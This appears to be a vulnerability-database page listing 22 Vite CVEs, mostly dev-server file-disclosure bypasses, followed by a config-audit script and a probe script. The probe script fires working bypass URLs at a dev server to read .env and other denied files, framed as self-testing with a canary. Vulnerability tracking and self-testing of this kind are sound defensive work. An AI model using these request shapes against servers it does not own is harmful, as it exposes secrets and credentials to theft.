cvebase

Vitejs Vite vulnerabilities

22 known vulnerabilities affecting vitejs/vite.

Total CVEs: 22
CISA KEV: 1 (actively exploited)
Public exploits: 12
Exploited in wild: 3
Severity breakdown: HIGH 8, MEDIUM 14

Vulnerabilities

Row format: CVE | priority | severity | CVSS score | flags (KEV = listed in CISA Known Exploited Vulnerabilities; Exploited = exploited in the wild; PoC = public exploit available) | fix and affected version ranges | published date. Descriptions ending in "…" are cut off on the source page.

Page 1 of 2

CVE-2025-31125 | P1 | HIGH | CVSS 7.5 | KEV, PoC | fixed in 4.5.11; affects ≥ 5.0.0, < 5.4.16 (+7 more ranges) | 2025-03-31
CWE-200. Vite is a frontend tooling framework for javascript. Vite exposes content of non-allowed files using ?inline&import or ?raw?import. Only apps explicitly exposing the Vite dev server to the network (using --host or server.host config option) are affected. This vulnerability is fixed in 6.2.4, 6.1.3, 6.0.13, 5.4.16, and 4.5.11.

CVE-2025-30208 | P1 | HIGH | CVSS 7.5 | Exploited, PoC | fixed in 4.5.10; affects ≥ 5.0.0, < 5.4.15 (+7 more ranges) | 2025-03-24
CWE-200. Vite, a provider of frontend development tooling, has a vulnerability in versions prior to 6.2.3, 6.1.2, 6.0.12, 5.4.15, and 4.5.10. `@fs` denies access to files outside of the Vite serving allow list. Adding `?raw??` or `?import&raw??` to the URL bypasses this limitation and returns the file content if it exists. This bypass exists because trailing separ…

CVE-2026-39365 | P1 | MEDIUM | CVSS 5.3 | Exploited, PoC | affects ≥ 6.0.0, ≤ 6.4.1; ≥ 7.0.0, ≤ 7.3.1 (+4 more ranges) | 2026-04-07
CWE-22. Vite is a frontend tooling framework for JavaScript. From 6.0.0 to before 6.4.2, 7.3.2, and 8.0.5, the dev server's handling of .map requests for optimized dependencies resolves file paths and calls readFile without restricting ../ segments in the URL. As a result, it is possible to bypass the server.fs.strict allow list and retrieve .map files locat…

CVE-2026-39363 | P2 | HIGH | CVSS 7.5 | PoC | affects ≥ 6.0.0, ≤ 6.4.1; ≥ 7.0.0, ≤ 7.3.1 (+4 more ranges) | 2026-04-07
CWE-200. Vite is a frontend tooling framework for JavaScript. From 6.0.0 to before 6.4.2, 7.3.2, and 8.0.5, if it is possible to connect to the Vite dev server's WebSocket without an Origin header, an attacker can invoke fetchModule via the custom WebSocket event vite:invoke and combine file://... with ?raw (or ?inline) to retrieve the contents of arbitrary fi…

CVE-2023-34092 | P2 | HIGH | CVSS 7.5 | PoC | affects ≥ 3.0.2, < 3.2.7; ≥ 4.0.0, < 4.0.5 (+8 more ranges) | 2023-06-01
CWE-50. Vite provides frontend tooling. Prior to versions 2.9.16, 3.2.7, 4.0.5, 4.1.5, 4.2.3, and 4.3.9, the Vite server option `server.fs.deny` can be bypassed using a double forward slash (//), which allows any unauthenticated user to read files from the Vite root path of the application, including those covered by the default `fs.deny` settings (`['.env', '.env.*', '*.{crt,pem}']`). On…

CVE-2025-31486 | P3 | MEDIUM | CVSS 5.3 | PoC | fixed in 4.5.12; affects ≥ 5.0.0, < 5.4.17 (+3 more ranges) | 2025-04-03
CWE-200. Vite is a frontend tooling framework for javascript. The contents of arbitrary files can be returned to the browser. By adding ?.svg with ?.wasm?init or with a sec-fetch-dest: script header, the server.fs.deny restriction could be bypassed. This bypass is only possible if the file is smaller than build.assetsInlineLimit (default: 4kB) and when using…

CVE-2026-39364 | P3 | HIGH | CVSS 7.5 | PoC | affects ≥ 7.0.0, ≤ 7.3.1; ≥ 8.0.0, ≤ 8.0.4 (+2 more ranges) | 2026-04-07
CWE-180. Vite is a frontend tooling framework for JavaScript. From 7.1.0 to before 7.3.2 and 8.0.5, on the Vite dev server, files that should be blocked by server.fs.deny (e.g., .env, *.crt) can be retrieved with HTTP 200 responses when query parameters such as ?raw, ?import&raw, or ?import&url&inline are appended. This vulnerability is fixed in 7.3.2 and 8.0…

CVE-2025-62522 | P3 | MEDIUM | CVSS 6.0 | PoC | affects ≥ 7.1.0, < 7.1.11; ≥ 7.0.0, < 7.0.8 (+5 more ranges) | 2025-10-20
CWE-22. Vite is a frontend tooling framework for JavaScript. In versions from 2.9.18 to before 3.0.0, 3.2.9 to before 4.0.0, 4.5.3 to before 5.0.0, 5.2.6 to before 5.4.21, 6.0.0 to before 6.4.1, 7.0.0 to before 7.0.8, and 7.1.0 to before 7.1.11, files denied by server.fs.deny were sent if the URL ended with \ when the dev server is running on Windows. Only ap…

CVE-2025-32395 | P3 | MEDIUM | CVSS 6.0 | PoC | affects ≥ 6.2.0, < 6.2.6; ≥ 6.1.0, < 6.1.5 (+3 more ranges) | 2025-04-10
CWE-200. Vite is a frontend tooling framework for javascript. Prior to 6.2.6, 6.1.5, 6.0.15, 5.4.18, and 4.5.13, the contents of arbitrary files can be returned to the browser if the dev server is running on Node or Bun. The HTTP/1.1 spec (RFC 9112) does not allow # in the request-target, but an attacker can still send such a request. For those requests with an inval…

CVE-2025-58751 | P3 | MEDIUM | CVSS 5.3 | PoC | fixed in 5.4.20; affects ≥ 6.0.0, < 6.3.6 (+5 more ranges) | 2025-09-08
CWE-22. Vite is a frontend tooling framework for JavaScript. Prior to versions 7.1.5, 7.0.7, 6.3.6, and 5.4.20, files whose names start with the same name as the public directory were served, bypassing the `server.fs` settings. Only apps that explicitly expose the Vite dev server to the network (using --host or `server.host` config option), use the public directory…

CVE-2023-49293 | P3 | MEDIUM | CVSS 6.1 | PoC | affects ≥ 4.4.0, ≤ 4.4.11; ≥ 5.0.0, ≤ 5.0.4 (+4 more ranges) | 2023-12-04
CWE-79. Vite is a website frontend framework. When Vite's HTML transformation is invoked manually via `server.transformIndexHtml`, the original request URL is passed in unmodified, and the `html` being transformed contains inline module scripts (`...`), it is possible to inject arbitrary HTML into the transformed output by supplying a malicious URL query str…

CVE-2025-46565 | P3 | MEDIUM | CVSS 5.3 | PoC | fixed in 4.5.14; affects ≥ 5.0.0, < 5.4.19 (+7 more ranges) | 2025-05-01
CWE-22. Vite is a frontend tooling framework for javascript. Prior to versions 6.3.4, 6.2.7, 6.1.6, 5.4.19, and 4.5.14, the contents of files in the project root that are denied by a file matching pattern can be returned to the browser. Only apps explicitly exposing the Vite dev server to the network (using --host or server.host config option) are affected. O…

CVE-2024-52011 | P3 | HIGH | CVSS 8.3 | fixed in 5.4.9 | 2026-06-01
CWE-77 (in the launch-editor dependency). launch-editor allows users to open files with line numbers in an editor from Node.js. Prior to version 2.9.0, due to insufficient sanitization of the `file` argument in `launchEditor`, an attacker can execute arbitrary commands on Windows by supplying a filename that contains special characters. This issue has been fixed in `launch-editor` vers…

CVE-2026-53571 | P3 | HIGH | CVSS 7.5 | fixed in 6.4.3; affects ≥ 7.0.0, < 7.3.5 (+3 more ranges) | 2026-06-22
CWE-22. Vite is a frontend tooling framework for JavaScript. Prior to 8.0.16, 7.3.5, and 6.4.3, the contents of files that are specified by server.fs.deny can be returned to the browser on Windows. Vite's dev server denies direct access to sensitive files through server.fs.deny, including entries such as .env, .env.*, and *.{crt,pem}. However, on Windows, the…

CVE-2024-23331 | P3 | HIGH | CVSS 7.5 | affects ≥ 2.7.0, < 2.9.17; ≥ 3.0.0, < 3.2.8 (+2 more ranges) | 2024-01-19
Vite is a frontend tooling framework for javascript. The Vite dev server option `server.fs.deny` can be bypassed on case-insensitive file systems using case-augmented versions of filenames. Notably this affects servers hosted on Windows. This bypass is similar to CVE-2023-34092, with surface area reduced to hosts having case-insensitive filesystems. Since `…

CVE-2026-53632 | P3 | MEDIUM | CVSS 5.5 | affects ≥ 8.0.0, < 8.0.16; ≥ 7.0.0, < 7.3.5 (+1 more range) | 2026-06-22
CWE-73 (in the launch-editor dependency). launch-editor allows users to open files with line numbers in an editor from Node.js. Prior to 2.14.1, the launch-editor NPM package accesses arbitrary paths including Windows UNC paths. When a UNC path is opened, Windows automatically attempts NTLM authentication to the remote host, causing the user's NTLMv2 password hash to be leaked to an attacker-con…

CVE-2024-45812 | P4 | MEDIUM | CVSS 6.4 | affects ≥ 5.4.0, < 5.4.6; ≥ 5.3.0, < 5.3.6 (+3 more ranges) | 2024-09-17
CWE-79. Vite is a frontend build tooling framework for javascript. Affected versions of vite were discovered to contain a DOM Clobbering vulnerability when building scripts to `cjs`/`iife`/`umd` output format. The DOM Clobbering gadget in the module can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an…

CVE-2025-24010 | P4 | MEDIUM | CVSS 6.5 | fixed in 4.5.6; affects ≥ 5.0.0, < 5.4.12 (+4 more ranges) | 2025-01-20
CWE-346. Vite is a frontend tooling framework for javascript. Vite allowed any website to send any request to the development server and read the response, due to default CORS settings and a lack of validation on the Origin header for WebSocket connections. This vulnerability is fixed in 6.0.9, 5.4.12, and 4.5.6.

CVE-2025-58752 | P4 | MEDIUM | CVSS 5.3 | fixed in 5.4.20; affects ≥ 6.0.0, < 6.3.6 (+5 more ranges) | 2025-09-08
CWE-23. Vite is a frontend tooling framework for JavaScript. Prior to versions 7.1.5, 7.0.7, 6.3.6, and 5.4.20, any HTML files on the machine were served regardless of the `server.fs` settings. Only apps that explicitly expose the Vite dev server to the network (using --host or server.host config option) and use `appType: 'spa'` (default) or `appType: 'mpa'`…

CVE-2024-31207 | P4 | MEDIUM | CVSS 5.9 | affects ≥ 2.7.0, ≤ 2.9.17; ≥ 3.0.0, ≤ 3.2.8 (+4 more ranges) | 2024-04-04
CWE-200. Vite (French word for "quick", pronounced /vit/, like "veet") is a frontend build tooling to improve the frontend development experience. `server.fs.deny` does not deny requests for patterns with directories. This vulnerability has been patched in version(s) 5.2.6, 5.1.7, 5.0.13, 4.5.3, 3.2.10 and 2.9.18.

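Nearly every entry above carries the same precondition: the dev server has been put on the network with --host or server.host, and the damage is then bounded by server.fs.strict, server.fs.deny and (for CVE-2025-24010) CORS. The audit below is an added example, not code from cvebase or from the Vite project: it takes the `server` object you would write in vite.config.js and reports which of those preconditions hold. The finding codes, the loopback address list, and the weak/hardened sample objects are my own; the default deny list (.env, .env.*, *.{crt,pem}) is the one quoted on this page.

```javascript
// Added example, not cvebase's or Vite's code. Audits a vite.config.js `server`
// object against the exposure conditions the advisories on this page repeat.
// Finding codes and the loopback list are assumptions of this example.

const DEFAULT_DENY = ['.env', '.env.*', '*.{crt,pem}']; // default fs.deny quoted on the page
const LOOPBACK = new Set(['localhost', '127.0.0.1', '::1']);

function auditServerConfig(server = {}) {
  const findings = [];
  const fs = server.fs || {};

  // --host / server.host: `true` or a non-loopback address puts the dev server on
  // the network, which is the stated precondition for most entries on this page.
  if (server.host === true || (typeof server.host === 'string' && !LOOPBACK.has(server.host))) {
    findings.push({ code: 'HOST_EXPOSED', detail: `server.host=${JSON.stringify(server.host)}` });
  }
  // server.fs.strict=false removes the allow-list check that the @fs bypasses target.
  if (fs.strict === false) {
    findings.push({ code: 'FS_STRICT_OFF', detail: 'server.fs.strict is false' });
  }
  // A user-supplied deny list replaces the defaults; report which defaults went missing.
  if (Array.isArray(fs.deny)) {
    const missing = DEFAULT_DENY.filter((d) => !fs.deny.includes(d));
    if (missing.length) findings.push({ code: 'DENY_MISSING_DEFAULTS', detail: missing.join(', ') });
  }
  // Allowing a filesystem root makes the allow list meaningless.
  if (Array.isArray(fs.allow) && fs.allow.some((p) => p === '/' || /^[A-Za-z]:[\\/]?$/.test(p))) {
    findings.push({ code: 'FS_ALLOW_ROOT', detail: 'server.fs.allow includes a filesystem root' });
  }
  // cors:true (or origin:'*') lets any site read dev-server responses (CVE-2025-24010 class).
  const cors = server.cors;
  if (cors === true || (cors && cors.origin === '*')) {
    findings.push({ code: 'CORS_ANY_ORIGIN', detail: 'server.cors allows any origin' });
  }
  return findings;
}

// The weak shape beside a tightened one; both are what you would put under
// `server:` in vite.config.js. Sample objects constructed for this example.
const weakServer = { host: true, cors: true, fs: { strict: false, deny: ['secrets/**'] } };
const hardenedServer = {
  host: '127.0.0.1', // loopback only; use an SSH tunnel or VPN if a teammate must reach it
  cors: false,
  fs: { strict: true, deny: [...DEFAULT_DENY, 'secrets/**'] },
};

for (const f of auditServerConfig(weakServer)) console.log(`${f.code}: ${f.detail}`);
```

Run it against your real config by importing the exported `server` object (or copying it in) and calling `auditServerConfig` on it; an empty array means none of the page's stated preconditions apply, which is not the same as being patched.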
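Several of the fs.deny bypasses above are just a URL shape (`?raw?import`, `?import&raw??` on `/@fs/`, a doubled leading slash, an upper-cased filename, a trailing backslash, plain `?raw`). The script below is an added example, not code from cvebase or from the Vite project: it builds those request shapes for a file you choose, sends them to a dev server you own, and classifies each answer. It assumes Node 18+ (global fetch), that the probed file defaults to `.env`, that `root` is the absolute project directory (only the /@fs probes need it), and that you have put a known canary string into the file beforehand so a leak is recognised by content rather than by status code. Only the CVEs whose request shape this page actually spells out are included; CVE-2025-32395 needs a literal `#` in the request-target, which fetch() will not send, and the .map traversal, public-directory and HTML entries give no concrete URL here.

```javascript
// Added example, not cvebase's or Vite's code. Probes a Vite dev server YOU OWN
// with the URL shapes the advisories on this page describe. Node 18+ assumed.
// Assumed names: `file` (default .env), `root` (absolute project dir, for /@fs),
// `canary` (a string you placed in the file). Avoid quotes and backslashes in
// the canary: ?raw answers wrap the file in a JS string literal, and escaping
// would break the substring match.

const PROBES = [
  // CVE-2025-31125: ?inline&import / ?raw?import
  { cve: 'CVE-2025-31125', make: (f) => `/${f}?inline&import` },
  { cve: 'CVE-2025-31125', make: (f) => `/${f}?raw?import` },
  // CVE-2026-39364: ?raw, ?import&raw, ?import&url&inline on a denied file
  { cve: 'CVE-2026-39364', make: (f) => `/${f}?raw` },
  { cve: 'CVE-2026-39364', make: (f) => `/${f}?import&raw` },
  { cve: 'CVE-2026-39364', make: (f) => `/${f}?import&url&inline` },
  // CVE-2023-34092: double leading slash
  { cve: 'CVE-2023-34092', make: (f) => `//${f}` },
  // CVE-2024-23331: case-augmented filename (case-insensitive filesystems only)
  { cve: 'CVE-2024-23331', make: (f) => `/${f.toUpperCase()}` },
  // CVE-2025-62522: URL ending in a backslash (Windows only), sent percent-encoded
  { cve: 'CVE-2025-62522', make: (f) => `/${f}%5C` },
  // CVE-2025-30208: /@fs/<abs path> with ?raw?? or ?import&raw?? (needs root)
  { cve: 'CVE-2025-30208', needsRoot: true, make: (f, root) => `/@fs${root}/${f}?raw??` },
  { cve: 'CVE-2025-30208', needsRoot: true, make: (f, root) => `/@fs${root}/${f}?import&raw??` },
];
// Not covered: CVE-2025-32395 needs a literal `#` in the request-target, which
// fetch() cannot send; use a raw TCP client for that one.

// Build absolute probe URLs. Plain string concatenation on purpose: new URL()
// would read "//.env" as a protocol-relative host and lose the probe.
function buildProbeUrls(base, file = '.env', root = null) {
  const origin = base.replace(/\/+$/, '');
  let abs = null;
  if (root) {
    abs = root.replace(/\\/g, '/').replace(/\/+$/, '');
    if (!abs.startsWith('/')) abs = '/' + abs; // Windows drive paths become /C:/...
  }
  return PROBES
    .filter((p) => !p.needsRoot || abs)
    .map((p) => ({ cve: p.cve, url: origin + p.make(file, abs) }));
}

// 403 is the dev server refusing (fs.deny / allow list); 404 means nothing was
// found at that path; a 200 counts as a leak only if the canary is in the body,
// because a 200 can also be the SPA index.html fallback.
function classify(status, body, canary) {
  if (status === 200 && body.includes(canary)) return 'LEAKED';
  if (status === 403) return 'blocked';
  if (status === 404) return 'not-found';
  return 'inconclusive';
}

async function probe(base, file, root, canary) {
  const results = [];
  for (const { cve, url } of buildProbeUrls(base, file, root)) {
    const res = await fetch(url, { redirect: 'manual' });
    const body = await res.text();
    results.push({ cve, url, status: res.status, verdict: classify(res.status, body, canary) });
  }
  return results;
}

// Usage: node vite-probe.js http://127.0.0.1:5173 .env /abs/project/root VITE_PROBE_CANARY=abc123
if (process.argv[2]) {
  const [base, file = '.env', root = null, canary = 'VITE_PROBE_CANARY'] = process.argv.slice(2);
  probe(base, file, root, canary).then((rows) => {
    for (const r of rows) console.log(`${r.verdict.padEnd(12)} ${r.status} ${r.cve} ${r.url}`);
  });
}
```

A clean run (every row `blocked` or `not-found`) only shows that these particular shapes are closed on this host; the case and backslash probes are meaningful only on case-insensitive filesystems and Windows respectively, and a `LEAKED` row is a finding regardless of which CVE label sits next to it.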